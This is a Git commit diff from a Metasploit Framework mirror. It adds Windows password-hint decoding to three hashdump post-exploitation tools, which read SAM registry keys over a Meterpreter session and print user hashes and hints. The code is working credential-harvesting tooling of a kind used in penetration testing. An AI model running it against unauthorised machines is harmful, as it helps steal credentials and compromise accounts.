infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding Windows User Password Hint Decoding to Hashdump Tools 

* UserPasswordHint, a key that is used to store the users password
hint, can be easily decoded to clear-text to get the users hint
(Example: "My Favorite Color")
* Added decode_windows_hint() method to perform the decode process
* Added decoded hint output for hashdump.rb and smart_hashdump.rb
unstable
Jonathan Claudius 2012-08-19 23:04:11 -05:00
parent f46545db58
commit fbc36b57d0
3 changed files with 73 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/post/windows/gather/hashdump.rb
View File

@ -87,6 +87,12 @@ class Metasploit3 < Msf::Post
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
#If we have a hint, decode and add to the hashstring
if !users[rid][:UserPasswordHint].nil?
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_line hashstring print_line hashstring
end end
print_line() print_line()
@ -164,6 +170,13 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -205,6 +218,15 @@ class Metasploit3 < Msf::Post
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")

26
modules/post/windows/gather/smart_hashdump.rb
View File

@ -140,6 +140,13 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -183,6 +190,16 @@ class Metasploit3 < Msf::Post
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
#-------------------------------------------------------------------------------
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -279,7 +296,14 @@ class Metasploit3 < Msf::Post
# next if guest account or support account # next if guest account or support account
next if rid == 501 or rid == 1001 next if rid == 501 or rid == 1001
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n" collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
#If we have a hint, decode and populate hint_string
hint_string = ""
if !users[rid][:UserPasswordHint].nil?
hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
session.framework.db.report_auth_info( session.framework.db.report_auth_info(
:host => host, :host => host,
:port => @smb_port, :port => @smb_port,

23
scripts/meterpreter/hashdump.rb
View File

@ -101,6 +101,13 @@ def capture_user_keys
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -142,6 +149,15 @@ def decrypt_user_keys(hbootkey, users)
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -239,7 +255,14 @@ if client.platform =~ /win32|win64/
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
#If we have a hint, decode and add to the hashstring
if !users[rid][:UserPasswordHint].nil?
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_line hashstring print_line hashstring
end end
print_line() print_line()
print_line() print_line()